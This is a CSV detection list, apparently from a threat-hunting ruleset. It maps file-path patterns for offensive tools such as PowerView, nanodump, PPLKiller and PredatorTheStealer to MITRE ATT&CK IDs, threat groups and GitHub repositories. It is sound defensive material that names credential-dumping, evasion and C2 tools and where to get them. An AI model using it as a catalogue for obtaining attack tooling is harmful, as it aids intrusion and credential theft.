"*/PowerLurk.git*",".{0,1000}\/PowerLurk\.git.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","1","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","9810"
"*/PowerLurk.ps1*",".{0,1000}\/PowerLurk\.ps1.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","1","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","9811"
"*/Powermad.git*",".{0,1000}\/Powermad\.git.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","N/A","10","1303","181","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z","9812"
"*/Powermad.ps1*",".{0,1000}\/Powermad\.ps1.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","9813"
"*/PowerPick.exe*",".{0,1000}\/PowerPick\.exe.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","9814"
"*/Powerpreter.psm1*",".{0,1000}\/Powerpreter\.psm1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9815"
"*/PowerProxy.git*",".{0,1000}\/PowerProxy\.git.{0,1000}","offensive_tool_keyword","PowerProxy","PowerShell SOCKS proxy with reverse proxy capabilities","T1090.003 - T1059.001 - T1105","TA0011 - TA0005 - TA0008","N/A","Dispossessor","C2","https://github.com/get-get-get-get/PowerProxy","1","1","N/A","N/A","10","10","80","10","2021-04-23T16:51:28Z","2020-01-03T18:18:58Z","9816"
"*/PowerProxy.ps1*",".{0,1000}\/PowerProxy\.ps1.{0,1000}","offensive_tool_keyword","PowerProxy","PowerShell SOCKS proxy with reverse proxy capabilities","T1090.003 - T1059.001 - T1105","TA0011 - TA0005 - TA0008","N/A","Dispossessor","C2","https://github.com/get-get-get-get/PowerProxy","1","1","N/A","N/A","10","10","80","10","2021-04-23T16:51:28Z","2020-01-03T18:18:58Z","9817"
"*/power-pwn.git*",".{0,1000}\/power\-pwn\.git.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","9818"
"*/PowerSCCM.git*",".{0,1000}\/PowerSCCM\.git.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tool","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","N/A","8","4","354","106","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z","9819"
"*/PowerSharpPack.git*",".{0,1000}\/PowerSharpPack\.git.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","9820"
"*/PowerShdll.exe*",".{0,1000}\/PowerShdll\.exe.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","1","N/A","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","9821"
"*/powershell/process_injection/*",".{0,1000}\/powershell\/process_injection\/.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","9822"
"*/powershell_executor/*.go*",".{0,1000}\/powershell_executor\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","9823"
"*/PowershellKerberos.git*",".{0,1000}\/PowershellKerberos\.git.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/MzHmO/PowershellKerberos","1","1","N/A","N/A","9","4","328","44","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z","9824"
"*/PowerShellRunner.git*",".{0,1000}\/PowerShellRunner\.git.{0,1000}","offensive_tool_keyword","PowerShellRunner","PowerShell runner for executing malicious payloads in order to bypass Windows Defender","T1059.001 - T1562.001 - T1218.005","TA0002 - TA0005","N/A","Turla","Defense Evasion","https://github.com/dievus/PowerShellRunner","1","1","N/A","N/A","9","1","70","20","2021-11-22T18:43:16Z","2021-08-03T01:29:34Z","9825"
"*/Powershell-Scripts-for-Hackers-and-Pentesters*",".{0,1000}\/Powershell\-Scripts\-for\-Hackers\-and\-Pentesters.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","1","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","9826"
"*/PowershellTools.git*",".{0,1000}\/PowershellTools\.git.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","1","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","9827"
"*/PowerShx.git*",".{0,1000}\/PowerShx\.git.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","N/A","7","3","286","47","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z","9828"
"*/PowerTools.ps1*",".{0,1000}\/PowerTools\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","1","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","9829"
"*/PowerUp.ps1*",".{0,1000}\/PowerUp\.ps1.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","1","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","9830"
"*/PowerUp.ps1*",".{0,1000}\/PowerUp\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","9831"
"*/PowerUpSQL.ps1*",".{0,1000}\/PowerUpSQL\.ps1.{0,1000}","offensive_tool_keyword","PowerUpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Black Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","PowerUpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","9832"
"*/PowerUpSQL.ps1*",".{0,1000}\/PowerUpSQL\.ps1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","PowerUpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","9833"
"*/PowerView.cna*",".{0,1000}\/PowerView\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","9834"
"*/PowerView.ps1*",".{0,1000}\/PowerView\.ps1.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","1","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","9835"
"*/powerview.ps1*",".{0,1000}\/powerview\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","9836"
"*/PowerView.ps1*",".{0,1000}\/PowerView\.ps1.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","9837"
"*/powerview.py*",".{0,1000}\/powerview\.py.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","N/A","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","9838"
"*/powerview.py.git*",".{0,1000}\/powerview\.py\.git.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","1","N/A","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","9839"
"*/PowerView3.cna*",".{0,1000}\/PowerView3\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","9840"
"*/PPEnum/*",".{0,1000}\/PPEnum\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","N/A","2","115","9","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z","9841"
"*/ppid_spoofing.exe*",".{0,1000}\/ppid_spoofing\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","9842"
"*/ppl/ppl.c*",".{0,1000}\/ppl\/ppl\.c.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","9843"
"*/ppl_dump.*",".{0,1000}\/ppl_dump\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","9844"
"*/PPLBlade.git*",".{0,1000}\/PPLBlade\.git.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","9845"
"*/ppldump.*",".{0,1000}\/ppldump\..{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","N/A","10","10","140","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z","9846"
"*/PPLDump_BOF/*",".{0,1000}\/PPLDump_BOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","N/A","10","10","140","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z","9847"
"*/PPLFault/*",".{0,1000}\/PPLFault\/.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","9848"
"*/PPLKiller.git*",".{0,1000}\/PPLKiller\.git.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","N/A","10","10","933","139","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z","9849"
"*/PPLKiller/*",".{0,1000}\/PPLKiller\/.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","N/A","10","10","933","139","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z","9850"
"*/PPLmedic.exe*",".{0,1000}\/PPLmedic\.exe.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","1","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","9851"
"*/PPLmedic.git*",".{0,1000}\/PPLmedic\.git.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","1","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","9852"
"*/pplsystem.exe*",".{0,1000}\/pplsystem\.exe.{0,1000}","offensive_tool_keyword","PPLSystem","creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.","T1003.002","TA0006","N/A","N/A","Credential Access","https://github.com/Slowerzs/PPLSystem","1","1","N/A","N/A","10","2","190","23","2024-05-29T18:33:35Z","2024-05-22T17:48:49Z","9853"
"*/PPLSystem.git*","\/PPLSystem\.git","offensive_tool_keyword","PPLSystem","creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.","T1003.002","TA0006","N/A","N/A","Credential Access","https://github.com/Slowerzs/PPLSystem","1","1","N/A","N/A","10","2","190","23","2024-05-29T18:33:35Z","2024-05-22T17:48:49Z","9854"
"*/pptp-version.nse*",".{0,1000}\/pptp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9855"
"*/Prasadhak.ps1*",".{0,1000}\/Prasadhak\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9856"
"*/Pre2kSpray.ps1*",".{0,1000}\/Pre2kSpray\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Pre2kSpray","Enumerate domain machine accounts and perform pre2k password spraying.","T1087.002 - T1110.003","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/eversinc33/Invoke-Pre2kSpray","1","1","N/A","N/A","8","1","69","11","2023-07-14T06:50:22Z","2023-07-05T10:07:38Z","9857"
"*/precompiled-binaries.git*",".{0,1000}\/precompiled\-binaries\.git.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","9858"
"*/PredatorTheStealer.git*",".{0,1000}\/PredatorTheStealer\.git.{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006  - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","1","N/A","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","9859"
"*/prefetch-tool.git*",".{0,1000}\/prefetch\-tool\.git.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","1","N/A","N/A","8","1","90","10","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z","9860"
